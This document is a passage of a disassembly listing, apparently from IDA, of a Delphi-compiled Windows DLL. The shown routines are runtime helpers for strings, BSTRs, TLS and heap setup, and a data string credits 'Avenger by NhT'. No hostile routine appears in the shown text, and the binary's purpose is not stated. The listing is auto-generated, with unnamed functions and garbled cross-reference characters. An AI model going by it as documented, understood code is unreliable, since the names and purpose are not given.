mov edi, eax
test esi, esi
jz short loc_100017E5
mov edx, eax
mov eax, esi
call sub_100011D4
loc_100017E5: ; CODE XREF: sub_100017C4+16�j
mov eax, ebx
call sub_100016D8
mov [ebx], edi
pop edi
pop esi
pop ebx
retn
sub_100017C4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __fastcall sub_100017F4(LPCSTR lpMultiByteStr, int cchWideChar, int cbMultiByte)
sub_100017F4 proc near ; CODE XREF: sub_10001B84+3B�p
; sub_10001B84+69�p
cbMultiByte = dword ptr 8
push ebp
mov ebp, esp
push edx ; cchWideChar
push eax ; lpWideCharStr
mov eax, [ebp+cbMultiByte]
push eax ; cbMultiByte
push ecx ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
call MultiByteToWideChar ; MultiByteToWideChar
pop ebp
retn 4
sub_100017F4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_1000180C proc near ; CODE XREF: sub_100036EC+B8�p
; sub_10004540+75�p ...
xor ecx, ecx
test edx, edx
jz short loc_10001833
push edx
loc_10001813: ; CODE XREF: sub_1000180C+1D�j
cmp cl, [edx]
jz short loc_1000182E
cmp cl, [edx+1]
jz short loc_1000182D
cmp cl, [edx+2]
jz short loc_1000182C
cmp cl, [edx+3]
jz short loc_1000182B
add edx, 4
jmp short loc_10001813
; ---------------------------------------------------------------------------
loc_1000182B: ; CODE XREF: sub_1000180C+18�j
inc edx
loc_1000182C: ; CODE XREF: sub_1000180C+13�j
inc edx
loc_1000182D: ; CODE XREF: sub_1000180C+E�j
inc edx
loc_1000182E: ; CODE XREF: sub_1000180C+9�j
mov ecx, edx
pop edx
sub ecx, edx
loc_10001833: ; CODE XREF: sub_1000180C+4�j
jmp sub_100017C4
sub_1000180C endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_1000183C proc near ; CODE XREF: sub_10004670+1AF�p
; sub_10004EF0+94�p ...
push edi
push eax
push ecx
mov edi, edx
xor eax, eax
repne scasb
jnz short loc_10001849
not ecx
loc_10001849: ; CODE XREF: sub_1000183C+9�j
pop eax
add ecx, eax
pop eax
pop edi
jmp sub_100017C4
sub_1000183C endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_10001854 proc near ; CODE XREF: sub_100022B8+2F�p
; sub_10002400+2C�p ...
test eax, eax
jz short locret_1000185B
mov eax, [eax-4]
locret_1000185B: ; CODE XREF: sub_10001854+2�j
retn
sub_10001854 endp
; =============== S U B R O U T I N E =======================================
sub_1000185C proc near ; CODE XREF: CODE:100067DB�p
test edx, edx
jz short locret_1000189F
mov ecx, [eax]
test ecx, ecx
jz sub_1000172C
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, [ecx-4]
mov edx, [esi-4]
add edx, edi
cmp esi, ecx
jz short loc_10001894
call sub_10001AB4
mov eax, esi
mov ecx, [esi-4]
loc_10001887: ; CODE XREF: sub_1000185C+41�j
mov edx, [ebx]
add edx, edi
call sub_100011D4
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_10001894: ; CODE XREF: sub_1000185C+1F�j
call sub_10001AB4
mov eax, [ebx]
mov ecx, edi
jmp short loc_10001887
; ---------------------------------------------------------------------------
locret_1000189F: ; CODE XREF: sub_1000185C+2�j
retn
sub_1000185C endp
; =============== S U B R O U T I N E =======================================
sub_100018A0 proc near ; CODE XREF: CODE:10006771�p
; CODE:10006BD3�p
push ebx
push esi
push edi
push edx
push eax
mov ebx, edx
xor edi, edi
mov ecx, [esp+edx*4+14h]
test ecx, ecx
jz short loc_100018B7
cmp [eax], ecx
jnz short loc_100018B7
mov edi, eax
loc_100018B7: ; CODE XREF: sub_100018A0+F�j
; sub_100018A0+13�j
xor eax, eax
loc_100018B9: ; CODE XREF: sub_100018A0+2B�j
mov ecx, [esp+edx*4+14h]
test ecx, ecx
jz short loc_100018CA
add eax, [ecx-4]
cmp edi, ecx
jnz short loc_100018CA
xor edi, edi
loc_100018CA: ; CODE XREF: sub_100018A0+1F�j
; sub_100018A0+26�j
dec edx
jnz short loc_100018B9
test edi, edi
jz short loc_100018E5
mov edx, eax
mov eax, edi
mov esi, [edi]
mov esi, [esi-4]
call sub_10001AB4
push edi
add esi, [edi]
dec ebx
jmp short loc_100018ED
; ---------------------------------------------------------------------------
loc_100018E5: ; CODE XREF: sub_100018A0+2F�j
call sub_10001798
push eax
mov esi, eax
loc_100018ED: ; CODE XREF: sub_100018A0+43�j
; sub_100018A0+62�j
mov eax, [esp+ebx*4+18h]
mov edx, esi
test eax, eax
jz short loc_10001901
mov ecx, [eax-4]
add esi, ecx
call sub_100011D4
loc_10001901: ; CODE XREF: sub_100018A0+55�j
dec ebx
jnz short loc_100018ED
pop edx
pop eax
test edi, edi
jnz short loc_10001916
test edx, edx
jz short loc_10001911
dec dword ptr [edx-8]
loc_10001911: ; CODE XREF: sub_100018A0+6C�j
call sub_1000172C
loc_10001916: ; CODE XREF: sub_100018A0+68�j
pop edx
pop edi
pop esi
pop ebx
pop eax
lea esp, [esp+edx*4]
jmp eax
sub_100018A0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001924 proc near ; CODE XREF: sub_100027F8+3C�p
; sub_10004540+BB�p ...
push ebx
push esi
push edi
mov esi, eax
mov edi, edx
cmp eax, edx
jz loc_100019C2
test esi, esi
jz short loc_1000199F
test edi, edi
jz short loc_100019A6
mov eax, [esi-4]
mov edx, [edi-4]
sub eax, edx
ja short loc_10001947
add edx, eax
loc_10001947: ; CODE XREF: sub_10001924+1F�j
push edx
shr edx, 2
jz short loc_10001973
loc_1000194D: ; CODE XREF: sub_10001924+45�j
mov ecx, [esi]
mov ebx, [edi]
cmp ecx, ebx
jnz short loc_100019AD
dec edx
jz short loc_1000196D
mov ecx, [esi+4]
mov ebx, [edi+4]
cmp ecx, ebx
jnz short loc_100019AD
add esi, 8
add edi, 8
dec edx
jnz short loc_1000194D
jmp short loc_10001973
; ---------------------------------------------------------------------------
loc_1000196D: ; CODE XREF: sub_10001924+32�j
add esi, 4
add edi, 4
loc_10001973: ; CODE XREF: sub_10001924+27�j
; sub_10001924+47�j
pop edx
and edx, 3
jz short loc_1000199B
mov ecx, [esi]
mov ebx, [edi]
cmp cl, bl
jnz short loc_100019C2
dec edx
jz short loc_1000199B
cmp ch, bh
jnz short loc_100019C2
dec edx
jz short loc_1000199B
and ebx, 0FF0000h
and ecx, 0FF0000h
cmp ecx, ebx
jnz short loc_100019C2
loc_1000199B: ; CODE XREF: sub_10001924+53�j
; sub_10001924+5E�j ...
add eax, eax
jmp short loc_100019C2
; ---------------------------------------------------------------------------
loc_1000199F: ; CODE XREF: sub_10001924+11�j
mov edx, [edi-4]
sub eax, edx
jmp short loc_100019C2
; ---------------------------------------------------------------------------
loc_100019A6: ; CODE XREF: sub_10001924+15�j
mov eax, [esi-4]
sub eax, edx
jmp short loc_100019C2
; ---------------------------------------------------------------------------
loc_100019AD: ; CODE XREF: sub_10001924+2F�j
; sub_10001924+3C�j
pop edx
cmp cl, bl
jnz short loc_100019C2
cmp ch, bh
jnz short loc_100019C2
shr ecx, 10h
shr ebx, 10h
cmp cl, bl
jnz short loc_100019C2
cmp ch, bh
loc_100019C2: ; CODE XREF: sub_10001924+9�j
; sub_10001924+5B�j ...
pop edi
pop esi
pop ebx
retn
sub_10001924 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100019C8 proc near ; CODE XREF: sub_100022B8+13�p
; sub_10002400+F�p ...
test eax, eax
jz short locret_100019D5
mov edx, [eax-8]
inc edx
jle short locret_100019D5
inc dword ptr [eax-8]
locret_100019D5: ; CODE XREF: sub_100019C8+2�j
; sub_100019C8+8�j
retn
sub_100019C8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100019D8 proc near ; CODE XREF: sub_100025E0+38�p
; sub_1000292C+5A�p ...
test eax, eax
jz short loc_100019DE
retn
; ---------------------------------------------------------------------------
byte_100019DD db 0 ; DATA XREF: sub_100019D8:loc_100019DE�o
; ---------------------------------------------------------------------------
loc_100019DE: ; CODE XREF: sub_100019D8+2�j
mov eax, offset byte_100019DD
retn
sub_100019D8 endp
; =============== S U B R O U T I N E =======================================
sub_100019E4 proc near ; CODE XREF: sub_10001A24�j
mov edx, [eax]
test edx, edx
jz short loc_10001A21
mov ecx, [edx-8]
dec ecx
jz short loc_10001A21
push ebx
mov ebx, eax
mov eax, [edx-4]
call sub_10001798
mov edx, eax
mov eax, [ebx]
mov [ebx], edx
push eax
mov ecx, [eax-4]
call sub_100011D4
pop eax
mov ecx, [eax-8]
dec ecx
jl short loc_10001A1E
dec dword ptr [eax-8]
jnz short loc_10001A1E
lea eax, [eax-8]
call sub_10001108
loc_10001A1E: ; CODE XREF: sub_100019E4+2B�j
; sub_100019E4+30�j
mov edx, [ebx]
pop ebx
loc_10001A21: ; CODE XREF: sub_100019E4+4�j
; sub_100019E4+A�j
mov eax, edx
retn
sub_100019E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001A24 proc near ; CODE XREF: sub_100022B8+54�p
; CODE:10006927�p ...
jmp sub_100019E4
sub_10001A24 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001A2C proc near ; CODE XREF: sub_10002484+55�p
; sub_100036EC+F2�p ...
arg_0 = dword ptr 4
push ebx
test eax, eax
jz short loc_10001A5E
mov ebx, [eax-4]
test ebx, ebx
jz short loc_10001A5E
dec edx
jl short loc_10001A56
cmp edx, ebx
jge short loc_10001A5E
loc_10001A3F: ; CODE XREF: sub_10001A2C+2C�j
sub ebx, edx
test ecx, ecx
jl short loc_10001A5E
cmp ecx, ebx
jg short loc_10001A5A
loc_10001A49: ; CODE XREF: sub_10001A2C+30�j
add edx, eax
mov eax, [esp+4+arg_0]
call sub_100017C4
jmp short loc_10001A67
; ---------------------------------------------------------------------------
loc_10001A56: ; CODE XREF: sub_10001A2C+D�j
xor edx, edx
jmp short loc_10001A3F
; ---------------------------------------------------------------------------
loc_10001A5A: ; CODE XREF: sub_10001A2C+1B�j
mov ecx, ebx
jmp short loc_10001A49
; ---------------------------------------------------------------------------
loc_10001A5E: ; CODE XREF: sub_10001A2C+3�j
; sub_10001A2C+A�j ...
mov eax, [esp+4+arg_0]
call sub_100016D8
loc_10001A67: ; CODE XREF: sub_10001A2C+28�j
pop ebx
retn 4
sub_10001A2C endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_10001A6C proc near ; CODE XREF: sub_100036EC+E0�p
; sub_100036EC+112�p
test eax, eax
jz short locret_10001AB0
test edx, edx
jz short loc_10001AA5
push ebx
push esi
push edi
mov esi, eax
mov edi, edx
mov ecx, [edi-4]
push edi
mov edx, [esi-4]
dec edx
js short loc_10001AA0
mov al, [esi]
inc esi
sub ecx, edx
jle short loc_10001AA0
loc_10001A8C: ; CODE XREF: sub_10001A6C+32�j
repne scasb
jnz short loc_10001AA0
mov ebx, ecx
push esi
push edi
mov ecx, edx
repe cmpsb
pop edi
pop esi
jz short loc_10001AA8
mov ecx, ebx
jmp short loc_10001A8C
; ---------------------------------------------------------------------------
loc_10001AA0: ; CODE XREF: sub_10001A6C+17�j
; sub_10001A6C+1E�j ...
pop edx
xor eax, eax
jmp short loc_10001AAD
; ---------------------------------------------------------------------------
loc_10001AA5: ; CODE XREF: sub_10001A6C+6�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_10001AA8: ; CODE XREF: sub_10001A6C+2E�j
pop edx
mov eax, edi
sub eax, edx
loc_10001AAD: ; CODE XREF: sub_10001A6C+37�j
pop edi
pop esi
pop ebx
locret_10001AB0: ; CODE XREF: sub_10001A6C+2�j
retn
sub_10001A6C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001AB4 proc near ; CODE XREF: sub_10001234+7F�p
; sub_1000185C+21�p ...
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
xor edi, edi
test edx, edx
jle short loc_10001B09
mov eax, [ebx]
test eax, eax
jz short loc_10001AEA
cmp dword ptr [eax-8], 1
jnz short loc_10001AEA
sub eax, 8
add edx, 9
push eax
mov eax, esp
call sub_10001120
pop eax
add eax, 8
mov [ebx], eax
mov [eax-4], esi
mov byte ptr [esi+eax], 0
jmp short loc_10001B12
; ---------------------------------------------------------------------------
loc_10001AEA: ; CODE XREF: sub_10001AB4+11�j
; sub_10001AB4+17�j
mov eax, edx
call sub_10001798
mov edi, eax
mov eax, [ebx]
test eax, eax
jz short loc_10001B09
mov edx, edi
mov ecx, [eax-4]
cmp ecx, esi
jl short loc_10001B04
mov ecx, esi
loc_10001B04: ; CODE XREF: sub_10001AB4+4C�j
call sub_100011D4
loc_10001B09: ; CODE XREF: sub_10001AB4+B�j
; sub_10001AB4+43�j
mov eax, ebx
call sub_100016D8
mov [ebx], edi
loc_10001B12: ; CODE XREF: sub_10001AB4+34�j
pop edi
pop esi
pop ebx
retn
sub_10001AB4 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_10001B20
loc_10001B18: ; CODE XREF: sub_10001B20+E�j
; sub_10001C10+12�j
mov al, 1
jmp loc_100011C8
; END OF FUNCTION CHUNK FOR sub_10001B20
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_10001B20 proc near ; CODE XREF: sub_10001C60+F�p
; FUNCTION CHUNK AT 10001B18 SIZE 00000007 BYTES
test eax, eax
jz short locret_10001B34
push eax ; ui
push 0 ; strIn
call SysAllocStringLen
test eax, eax
jz loc_10001B18
locret_10001B34: ; CODE XREF: sub_10001B20+2�j
retn
sub_10001B20 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001B38 proc near ; CODE XREF: sub_10001C60+38�p
xchg edx, [eax]
test edx, edx
jz short locret_10001B44
push edx ; bstrString
call SysFreeString
locret_10001B44: ; CODE XREF: sub_10001B38+4�j
retn
sub_10001B38 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001B48 proc near ; CODE XREF: sub_10001B84+1B�p
; sub_10001C10+2�j
mov edx, [eax]
test edx, edx
jz short locret_10001B5C
mov dword ptr [eax], 0
push eax
push edx ; bstrString
call SysFreeString
pop eax
locret_10001B5C: ; CODE XREF: sub_10001B48+4�j
retn
sub_10001B48 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_10001B60 proc near ; CODE XREF: sub_100027F8+D7�p
push ebx
push esi
mov ebx, eax
mov esi, edx
loc_10001B66: ; CODE XREF: sub_10001B60+1C�j
mov eax, [ebx]
test eax, eax
jz short loc_10001B78
mov dword ptr [ebx], 0
push eax ; bstrString
call SysFreeString
loc_10001B78: ; CODE XREF: sub_10001B60+A�j
add ebx, 4
dec esi
jnz short loc_10001B66
pop esi
pop ebx
retn
sub_10001B60 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; int __fastcall sub_10001B84(int cbMultiByte)
sub_10001B84 proc near ; CODE XREF: sub_10001C34:loc_10001C3D�j
lpMultiByteStr = dword ptr -1014h
strIn = word ptr -1010h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFF004h
push eax
add esp, 0FFFFFFFCh
mov esi, ecx
mov [esp+1014h+lpMultiByteStr], edx
mov edi, eax
test esi, esi
jg short loc_10001BA6
mov eax, edi
call sub_10001B48
jmp short loc_10001C03
; ---------------------------------------------------------------------------
loc_10001BA6: ; CODE XREF: sub_10001B84+17�j
lea ebp, [esi+1]
cmp ebp, 7FFh
jge short loc_10001BD9
push esi ; cbMultiByte
lea eax, [esp+1018h+strIn]
mov ecx, [esp+1018h+lpMultiByteStr] ; lpMultiByteStr
mov edx, 7FFh ; cchWideChar
call sub_100017F4
mov ebx, eax
test ebx, ebx
jle short loc_10001BD9
lea edx, [esp+1014h+strIn] ; strIn
mov eax, edi
mov ecx, ebx ; ui
call sub_10001C10
jmp short loc_10001C03
; ---------------------------------------------------------------------------
loc_10001BD9: ; CODE XREF: sub_10001B84+2B�j
; sub_10001B84+44�j
mov ebx, ebp
mov eax, edi
mov edx, ebx
call sub_10001C60
push esi ; cbMultiByte
mov eax, [edi]
mov ecx, [esp+1018h+lpMultiByteStr] ; lpMultiByteStr
mov edx, ebx ; cchWideChar
call sub_100017F4
mov ebx, eax
test ebx, ebx
jge short loc_10001BFA
xor ebx, ebx
loc_10001BFA: ; CODE XREF: sub_10001B84+72�j
mov eax, edi
mov edx, ebx
call sub_10001C60
loc_10001C03: ; CODE XREF: sub_10001B84+20�j
; sub_10001B84+53�j
add esp, 1004h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_10001B84 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __fastcall sub_10001C10(UINT ui, OLECHAR *strIn)
sub_10001C10 proc near ; CODE XREF: sub_10001B84+4E�p
test ecx, ecx
jz sub_10001B48
push eax
push ecx ; ui
push edx ; strIn
call SysAllocStringLen
test eax, eax
jz loc_10001B18
pop edx
push dword ptr [edx] ; bstrString
mov [edx], eax
call SysFreeString
retn
sub_10001C10 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001C34 proc near ; CODE XREF: sub_100027F8+6B�p
; sub_100027F8+80�p
xor ecx, ecx
test edx, edx
jz short loc_10001C3D
mov ecx, [edx-4]
loc_10001C3D: ; CODE XREF: sub_10001C34+4�j
jmp sub_10001B84
sub_10001C34 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001C44 proc near ; CODE XREF: sub_100027F8+9C�p
; sub_100027F8+A5�p
test eax, eax
jz short loc_10001C4C
retn
; ---------------------------------------------------------------------------
align 2
word_10001C4A dw 0 ; DATA XREF: sub_10001C44:loc_10001C4C�o
; ---------------------------------------------------------------------------
loc_10001C4C: ; CODE XREF: sub_10001C44+2�j
mov eax, offset word_10001C4A
retn
sub_10001C44 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001C54 proc near ; CODE XREF: sub_10001C60+18�p
test eax, eax
jz short locret_10001C5D
mov eax, [eax-4]
shr eax, 1
locret_10001C5D: ; CODE XREF: sub_10001C54+2�j
retn
sub_10001C54 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_10001C60 proc near ; CODE XREF: sub_10001B84+5B�p
; sub_10001B84+7A�p
push ebx
push esi
push edi
mov esi, edx
mov edi, eax
xor ebx, ebx
test esi, esi
jle short loc_10001C94
mov eax, esi
call sub_10001B20
mov ebx, eax
mov eax, [edi]
call sub_10001C54
test eax, eax
jle short loc_10001C94
cmp esi, eax
jge short loc_10001C87
mov eax, esi
loc_10001C87: ; CODE XREF: sub_10001C60+23�j
mov ecx, eax
add ecx, ecx
mov edx, ebx
mov eax, [edi]
call sub_100011D4
loc_10001C94: ; CODE XREF: sub_10001C60+B�j
; sub_10001C60+1F�j
mov eax, edi
mov edx, ebx
call sub_10001B38
pop edi
pop esi
pop ebx
retn
sub_10001C60 endp
; ---------------------------------------------------------------------------
align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
align 4
; =============== S U B R O U T I N E =======================================
sub_10001CA8 proc near ; CODE XREF: CODE:10001CBF�p
; DATA XREF: sub_10001CC8:loc_10001CCF�o
mov al, 10h
jmp loc_100011C8
sub_10001CA8 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
loc_10001CB0: ; DATA XREF: sub_10001CC8+14�o
mov ax, [eax]
sub ax, 2
jb short locret_10001CC4
sub ax, 8
jz short locret_10001CC4
call sub_10001CA8
locret_10001CC4: ; CODE XREF: CODE:10001CB7�j
; CODE:10001CBD�j
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001CC8 proc near ; CODE XREF: CODE:10001DD0�p
mov edx, offset dword_100085BC
xor eax, eax
loc_10001CCF: ; CODE XREF: sub_10001CC8+12�j
mov dword ptr [edx+eax*4], offset sub_10001CA8
inc eax
cmp eax, 2Bh
jnz short loc_10001CCF
mov eax, offset loc_10001CB0
mov ds:dword_100085BC, eax
retn
sub_10001CC8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001CE8 proc near ; DATA XREF: CODE:10001DAB�o
mov al, 11h
jmp loc_100011C8
sub_10001CE8 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_10001CF0 proc near ; CODE XREF: sub_10005B8C+88�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push edx
push eax
mov eax, [esp+8+arg_4]
mul [esp+8+var_8]
mov ecx, eax
mov eax, [esp+8+var_4]
mul [esp+8+arg_0]
add ecx, eax
mov eax, [esp+8+var_8]
mul [esp+8+arg_0]
add edx, ecx
pop ecx
pop ecx
retn 8
sub_10001CF0 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_10001D14 proc near ; CODE XREF: sub_10001EB0+5�p
mov edx, ds:dword_10007014
mov [eax], edx
mov ds:dword_10007014, eax
retn
sub_10001D14 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001D24 proc near ; CODE XREF: sub_100015F0+66�p
; DATA XREF: DATA:off_1000701C�o
push ebx
push esi
mov esi, eax
mov ebx, ds:dword_10007018
test ebx, ebx
jz short loc_10001D3E
loc_10001D32: ; CODE XREF: sub_10001D24+18�j
mov eax, [esi+4]
call dword ptr [ebx+4]
mov ebx, [ebx]
test ebx, ebx
jnz short loc_10001D32
loc_10001D3E: ; CODE XREF: sub_10001D24+C�j
pop esi
pop ebx
retn
sub_10001D24 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001D44 proc near ; CODE XREF: sub_100031E0+42E�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
test eax, eax
jnz short loc_10001D52
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_10001D52: ; CODE XREF: sub_10001D44+8�j
call ds:off_10007038
pop ebp
retn
sub_10001D44 endp
; ---------------------------------------------------------------------------
align 4
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_10001D8F
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_10008588
jnz short loc_10001D81
call ds:off_10007060
call ds:off_1000702C
loc_10001D81: ; CODE XREF: CODE:10001D73�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10001D96
loc_10001D8E: ; CODE XREF: CODE:10001D94�j
retn
; ---------------------------------------------------------------------------
loc_10001D8F: ; DATA XREF: CODE:10001D62�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_10001D8E
; ---------------------------------------------------------------------------
loc_10001D96: ; CODE XREF: CODE:loc_10001D8E�j
; DATA XREF: CODE:10001D89�o
pop ebp
retn
; ---------------------------------------------------------------------------
sub ds:dword_10008588, 1
jnb short locret_10001DDF
call GetProcessHeap ; GetProcessHeap
mov ds:hHeap, eax
mov ds:dword_10008000, offset sub_10001CE8
mov ds:word_10008028, 0D7B0h
mov ds:word_100081F4, 0D7B0h
mov ds:word_100083C0, 0D7B0h
call sub_10001CC8
call GetCurrentThreadId ; GetCurrentThreadId
mov ds:dword_10008018, eax
locret_10001DDF: ; CODE XREF: CODE:10001D9F�j
retn
; ---------------------------------------------------------------------------
dd 0FFFFFFFFh, 2Fh
aPortionsCopyri db 'Portions Copyright (c) 1999,2003 Avenger by NhT',0
; DATA XREF: DATA:off_10007064�o
; =============== S U B R O U T I N E =======================================
sub_10001E18 proc near ; CODE XREF: sub_10001E2C+21�p
push eax ; uBytes
push 40h ; uFlags
call LocalAlloc ; LocalAlloc
retn
sub_10001E18 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001E24 proc near ; CODE XREF: sub_10001E2C+1�p
mov eax, 4
retn
sub_10001E24 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001E2C proc near ; CODE XREF: sub_10001E70:loc_10001E8A�p
push ebx
call sub_10001E24
mov ebx, eax
test ebx, ebx
jz short loc_10001E6E
cmp ds:TlsIndex, 0FFFFFFFFh
jnz short loc_10001E4B
mov eax, 0E2h
call sub_100016CC
; ---------------------------------------------------------------------------
loc_10001E4B: ; CODE XREF: sub_10001E2C+13�j
mov eax, ebx
call sub_10001E18
test eax, eax
jnz short loc_10001E62
mov eax, 0E2h
call sub_100016CC
; ---------------------------------------------------------------------------
jmp short loc_10001E6E
; ---------------------------------------------------------------------------
loc_10001E62: ; CODE XREF: sub_10001E2C+28�j
push eax ; lpTlsValue
mov eax, ds:TlsIndex
push eax ; dwTlsIndex
call TlsSetValue ; TlsSetValue
loc_10001E6E: ; CODE XREF: sub_10001E2C+A�j
; sub_10001E2C+34�j
pop ebx
retn
sub_10001E2C endp
; =============== S U B R O U T I N E =======================================
sub_10001E70 proc near ; CODE XREF: sub_1000117C+20�p
mov cl, ds:byte_10008668
mov eax, ds:TlsIndex
test cl, cl
jnz short loc_10001EA5
mov edx, large fs:2Ch
mov eax, [edx+eax*4]
retn
; ---------------------------------------------------------------------------
loc_10001E8A: ; CODE XREF: sub_10001E70+3D�j
call sub_10001E2C
mov eax, ds:TlsIndex
push eax ; dwTlsIndex
call TlsGetValue ; TlsGetValue
test eax, eax
jz short loc_10001E9F
retn
; ---------------------------------------------------------------------------
loc_10001E9F: ; CODE XREF: sub_10001E70+2C�j
mov eax, ds:dword_10008674
retn
; ---------------------------------------------------------------------------
loc_10001EA5: ; CODE XREF: sub_10001E70+D�j
push eax ; dwTlsIndex
call TlsGetValue ; TlsGetValue
test eax, eax
jz short loc_10001E8A
retn
sub_10001E70 endp
; =============== S U B R O U T I N E =======================================
sub_10001EB0 proc near ; CODE XREF: sub_10001EBC+2E�p
mov eax, offset dword_1000706C
call sub_10001D14
retn
sub_10001EB0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001EBC proc near ; CODE XREF: CODE:10005CE4�p
push ebx
mov ebx, eax
xor eax, eax
mov ds:TlsIndex, eax
push 0 ; lpModuleName
call GetModuleHandleA ; GetModuleHandleA
mov ds:dword_1000866C, eax
mov eax, ds:dword_1000866C
mov ds:dword_10007070, eax
xor eax, eax
mov ds:dword_10007074, eax
xor eax, eax
mov ds:dword_10007078, eax
call sub_10001EB0
mov edx, offset dword_1000706C
mov eax, ebx
call sub_10001584
pop ebx
retn
sub_10001EBC endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_10001F31
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_10008670
jnz short loc_10001F23
mov eax, offset off_10007064
call sub_100016D8
loc_10001F23: ; CODE XREF: CODE:10001F17�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10001F38
loc_10001F30: ; CODE XREF: CODE:10001F36�j
retn
; ---------------------------------------------------------------------------
loc_10001F31: ; DATA XREF: CODE:10001F06�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_10001F30
; ---------------------------------------------------------------------------
loc_10001F38: ; CODE XREF: CODE:loc_10001F30�j
; DATA XREF: CODE:10001F2B�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
sub ds:dword_10008670, 1
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_10001F69
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_10008678
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10001F70
loc_10001F68: ; CODE XREF: CODE:10001F6E�j
retn
; ---------------------------------------------------------------------------
loc_10001F69: ; DATA XREF: CODE:10001F4A�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_10001F68
; ---------------------------------------------------------------------------
loc_10001F70: ; CODE XREF: CODE:loc_10001F68�j
; DATA XREF: CODE:10001F63�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
sub ds:dword_10008678, 1
retn
; [00000006 BYTES: COLLAPSED FUNCTION GetModuleHandleA_0. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION GetProcAddress. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION LoadLibraryA. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION lstrlenW. PRESS KEYPAD "+" TO EXPAND]
align 4
; =============== S U B R O U T I N E =======================================
sub_10001F9C proc near ; CODE XREF: sub_100031E0+1EA�p
; sub_100031E0+279�p
xchg eax, edx
call sub_100011D4
retn
sub_10001F9C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001FA4 proc near ; CODE XREF: sub_100031E0+2E3�p
; sub_100031E0+2F3�p
xor ecx, ecx
call sub_10001440
retn
sub_10001FA4 endp
; ---------------------------------------------------------------------------
push ebp
